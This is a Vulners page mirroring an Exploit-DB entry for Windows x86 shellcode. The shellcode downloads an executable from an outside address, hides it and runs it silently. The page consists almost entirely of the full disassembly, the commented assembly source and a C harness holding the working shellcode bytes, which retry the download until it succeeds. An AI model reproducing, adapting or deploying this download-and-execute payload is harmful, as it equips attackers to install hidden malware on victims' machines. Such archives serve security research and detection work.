Vulners
Lucene search
Windows x86 URLDownloadToFileA+SetFileAttributesA+WinExec+ExitProcess Shellcode
🗓️ 13 Jul 2016 00:00:00Reported by Roziul Hasan Khan ShifatType 
exploitdb🔗 www.exploit-db.com👁 45 Views
/*
Title : Windows x86 URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() shellcode
Date : 12-07-2016
Author : Roziul Hasan Khan Shifat
Tested on: Windows 7 x86
*/
/*
Disassembly of section .text:
00000000 <_start>:
0: 31 c9 xor %ecx,%ecx
2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
6: 8b 40 0c mov 0xc(%eax),%eax
9: 8b 70 14 mov 0x14(%eax),%esi
c: ad lods %ds:(%esi),%eax
d: 96 xchg %eax,%esi
e: ad lods %ds:(%esi),%eax
f: 8b 48 10 mov 0x10(%eax),%ecx
12: 8b 59 3c mov 0x3c(%ecx),%ebx
15: 01 cb add %ecx,%ebx
17: 8b 5b 78 mov 0x78(%ebx),%ebx
1a: 01 cb add %ecx,%ebx
1c: 8b 73 20 mov 0x20(%ebx),%esi
1f: 01 ce add %ecx,%esi
21: 31 d2 xor %edx,%edx
00000023 <count>:
23: 42 inc %edx
24: ad lods %ds:(%esi),%eax
25: 01 c8 add %ecx,%eax
27: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
2d: 75 f4 jne 23 <count>
2f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
36: 75 eb jne 23 <count>
38: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
3f: 75 e2 jne 23 <count>
41: 8b 73 1c mov 0x1c(%ebx),%esi
44: 01 ce add %ecx,%esi
46: 8b 14 96 mov (%esi,%edx,4),%edx
49: 01 ca add %ecx,%edx
4b: 31 f6 xor %esi,%esi
4d: 89 d6 mov %edx,%esi
4f: 89 cf mov %ecx,%edi
51: 31 c0 xor %eax,%eax
53: 50 push %eax
54: 68 61 72 79 41 push $0x41797261
59: 68 4c 69 62 72 push $0x7262694c
5e: 68 4c 6f 61 64 push $0x64616f4c
63: 54 push %esp
64: 51 push %ecx
65: ff d2 call *%edx
67: 83 c4 0c add $0xc,%esp
6a: 31 c9 xor %ecx,%ecx
6c: 68 6c 6c 41 41 push $0x41416c6c
71: 88 4c 24 02 mov %cl,0x2(%esp)
75: 68 6f 6e 2e 64 push $0x642e6e6f
7a: 68 75 72 6c 6d push $0x6d6c7275
7f: 54 push %esp
80: ff d0 call *%eax
82: 83 c4 0c add $0xc,%esp
85: 31 c9 xor %ecx,%ecx
87: 68 65 41 42 42 push $0x42424165
8c: 88 4c 24 02 mov %cl,0x2(%esp)
90: 68 6f 46 69 6c push $0x6c69466f
95: 68 6f 61 64 54 push $0x5464616f
9a: 68 6f 77 6e 6c push $0x6c6e776f
9f: 68 55 52 4c 44 push $0x444c5255
a4: 54 push %esp
a5: 50 push %eax
a6: ff d6 call *%esi
a8: 83 c4 14 add $0x14,%esp
ab: 50 push %eax
000000ac <download>:
ac: 58 pop %eax
ad: 31 c9 xor %ecx,%ecx
af: 51 push %ecx
b0: 68 2e 65 78 65 push $0x6578652e
b5: 68 6d 70 6c 65 push $0x656c706d
ba: 68 30 2f 73 61 push $0x61732f30
bf: 68 36 2e 31 33 push $0x33312e36
c4: 68 36 38 2e 38 push $0x382e3836
c9: 68 39 32 2e 31 push $0x312e3239
ce: 68 3a 2f 2f 31 push $0x312f2f3a
d3: 68 68 74 74 70 push $0x70747468
d8: 54 push %esp
d9: 59 pop %ecx
da: 31 db xor %ebx,%ebx
dc: 53 push %ebx
dd: 68 2e 65 78 65 push $0x6578652e
e2: 68 70 79 6c 64 push $0x646c7970
e7: 54 push %esp
e8: 5b pop %ebx
e9: 31 d2 xor %edx,%edx
eb: 50 push %eax
ec: 52 push %edx
ed: 52 push %edx
ee: 53 push %ebx
ef: 51 push %ecx
f0: 52 push %edx
f1: ff d0 call *%eax
f3: 59 pop %ecx
f4: 83 c4 2c add $0x2c,%esp
f7: 31 d2 xor %edx,%edx
f9: 39 d0 cmp %edx,%eax
fb: 51 push %ecx
fc: 75 ae jne ac <download>
fe: 5a pop %edx
ff: 31 d2 xor %edx,%edx
101: 68 73 41 42 42 push $0x42424173
106: 88 54 24 02 mov %dl,0x2(%esp)
10a: 68 62 75 74 65 push $0x65747562
10f: 68 74 74 72 69 push $0x69727474
114: 68 69 6c 65 41 push $0x41656c69
119: 68 53 65 74 46 push $0x46746553
11e: 54 push %esp
11f: 57 push %edi
120: ff d6 call *%esi
122: 83 c4 14 add $0x14,%esp
125: 31 c9 xor %ecx,%ecx
127: 51 push %ecx
128: 68 2e 65 78 65 push $0x6578652e
12d: 68 70 79 6c 64 push $0x646c7970
132: 54 push %esp
133: 59 pop %ecx
134: 31 d2 xor %edx,%edx
136: 83 c2 02 add $0x2,%edx
139: 52 push %edx
13a: 51 push %ecx
13b: ff d0 call *%eax
13d: 83 c4 08 add $0x8,%esp
140: 31 c9 xor %ecx,%ecx
142: 68 78 65 63 41 push $0x41636578
147: 88 4c 24 03 mov %cl,0x3(%esp)
14b: 68 57 69 6e 45 push $0x456e6957
150: 54 push %esp
151: 57 push %edi
152: ff d6 call *%esi
154: 83 c4 08 add $0x8,%esp
157: 31 c9 xor %ecx,%ecx
159: 51 push %ecx
15a: 68 2e 65 78 65 push $0x6578652e
15f: 68 70 79 6c 64 push $0x646c7970
164: 54 push %esp
165: 59 pop %ecx
166: 31 d2 xor %edx,%edx
168: 52 push %edx
169: 51 push %ecx
16a: ff d0 call *%eax
16c: 83 c4 08 add $0x8,%esp
16f: 31 c9 xor %ecx,%ecx
171: 68 65 73 73 41 push $0x41737365
176: 88 4c 24 03 mov %cl,0x3(%esp)
17a: 68 50 72 6f 63 push $0x636f7250
17f: 68 45 78 69 74 push $0x74697845
184: 54 push %esp
185: 57 push %edi
186: ff d6 call *%esi
188: ff d0 call *%eax
*/
/*
section .text
global _start
_start:
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;Eax=PEB
mov eax,[eax+0xc] ;eax=PEB.Ldr
mov esi,[eax+0x14] ;esi=PEB.Ldr->InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
mov ecx,[eax+0x10] ;ecx=kernel32.dll base address
;------------------------------------
mov ebx,[ecx+0x3c] ;kernel32.dll +0x3c=DOS->e_flanew
add ebx,ecx ;ebx=PE HEADER
mov ebx,[ebx+0x78];Data_DIRECTORY->VirtualAddress
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx
;------------------------------------------
xor edx,edx
count:
inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jnz count
cmp dword [eax+4],'rocA'
jnz count
cmp dword [eax+8],'ddre'
jnz count
;---------------------------------------------
mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx
mov edx,[esi+edx*4]
add edx,ecx ;edx=GetProcAddress()
;-----------------------------------------
xor esi,esi
mov esi,edx ;GetProcAddress()
mov edi,ecx ;kernel32.dll
;------------------------------------
;finding address of LoadLibraryA()
xor eax,eax
push eax
push 0x41797261
push 0x7262694c
push 0x64616f4c
push esp
push ecx
call edx
;------------------------
add esp,12
;-----------------------------
;LoadLibraryA("urlmon.dll")
xor ecx,ecx
push 0x41416c6c
mov [esp+2],byte cl
push 0x642e6e6f
push 0x6d6c7275
push esp
call eax
;-----------------------
add esp,12
;-----------------------
;finding address of URLDownloadToFileA()
xor ecx,ecx
push 0x42424165
mov [esp+2],byte cl
push 0x6c69466f
push 0x5464616f
push 0x6c6e776f
push 0x444c5255
push esp
push eax
call esi
;------------------------
add esp,20
push eax
;---------------------------------------
;URLDownloadToFileA(NULL,url,save as,0,NULL)
download:
pop eax
xor ecx,ecx
push ecx
;-----------------------------
;change it to file url
push 0x6578652e
push 0x656c706d
push 0x61732f30
push 0x33312e36
push 0x382e3836
push 0x312e3239
push 0x312f2f3a
push 0x70747468
;-----------------------------------
push esp
pop ecx ;url http://192.168.86.130/sample.exe
xor ebx,ebx
push ebx
;------------------------
;save as (no need change it.if U want to change it,do it)
push 0x6578652e
push 0x646c7970
;-------------------------------
push esp ;pyld.exe
pop ebx ;save as
xor edx,edx
push eax
push edx
push edx
push ebx
push ecx
push edx
call eax
;-------------------------
pop ecx
add esp,44
xor edx,edx
cmp eax,edx
push ecx
jnz download ;if it fails to download , retry contineusly
;------------------
pop edx
;-----------------------
;Finding address of SetFileAttributesA()
xor edx,edx
push 0x42424173
mov [esp+2],byte dl
push 0x65747562
push 0x69727474
push 0x41656c69
push 0x46746553
push esp
push edi
call esi
;--------------------------------
add esp,20 ;U must adjust stack or it will crash
;--------------------
;calling SetFileAttributesA("pyld.exe",FILE_ATTRIBUTE_HIDDEN)
xor ecx,ecx
push ecx
push 0x6578652e
push 0x646c7970
push esp
pop ecx
xor edx,edx
add edx,2 ;FILE_ATTRIBUTE_HIDDEN
push edx
push ecx
call eax
;-------------------
add esp,8
;---------------------------
;finding address of WinExec()
xor ecx,ecx
push 0x41636578
mov [esp+3],byte cl
push 0x456e6957
push esp
push edi
call esi
;----------------------
add esp,8
;------------------------
;calling WinExec("pyld.exe",0)
xor ecx,ecx
push ecx
push 0x6578652e
push 0x646c7970
push esp
pop ecx
xor edx,edx
push edx
push ecx
call eax
;-------------------------
add esp,8
;-----------------------------
;finding address of ExitProcess()
xor ecx,ecx
push 0x41737365
mov [esp+3],byte cl
push 0x636f7250
push 0x74697845
push esp
push edi
call esi
;--------------
call eax
*/
#include<stdio.h>
#include<string.h>
char shellcode[]="\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x31\xf6\x89\xd6\x89\xcf\x31\xc0\x50\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x6c\x6c\x41\x41\x88\x4c\x24\x02\x68\x6f\x6e\x2e\x64\x68\x75\x72\x6c\x6d\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x65\x41\x42\x42\x88\x4c\x24\x02\x68\x6f\x46\x69\x6c\x68\x6f\x61\x64\x54\x68\x6f\x77\x6e\x6c\x68\x55\x52\x4c\x44\x54\x50\xff\xd6\x83\xc4\x14\x50\x58\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x6d\x70\x6c\x65\x68\x30\x2f\x73\x61\x68\x36\x2e\x31\x33\x68\x36\x38\x2e\x38\x68\x39\x32\x2e\x31\x68\x3a\x2f\x2f\x31\x68\x68\x74\x74\x70\x54\x59\x31\xdb\x53\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x5b\x31\xd2\x50\x52\x52\x53\x51\x52\xff\xd0\x59\x83\xc4\x2c\x31\xd2\x39\xd0\x51\x75\xae\x5a\x31\xd2\x68\x73\x41\x42\x42\x88\x54\x24\x02\x68\x62\x75\x74\x65\x68\x74\x74\x72\x69\x68\x69\x6c\x65\x41\x68\x53\x65\x74\x46\x54\x57\xff\xd6\x83\xc4\x14\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x59\x31\xd2\x83\xc2\x02\x52\x51\xff\xd0\x83\xc4\x08\x31\xc9\x68\x78\x65\x63\x41\x88\x4c\x24\x03\x68\x57\x69\x6e\x45\x54\x57\xff\xd6\x83\xc4\x08\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x59\x31\xd2\x52\x51\xff\xd0\x83\xc4\x08\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\xff\xd6\xff\xd0";
main()
{
printf("shellcode length %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Jul 2016 00:00Current
7.4High risk
Vulners AI Score7.4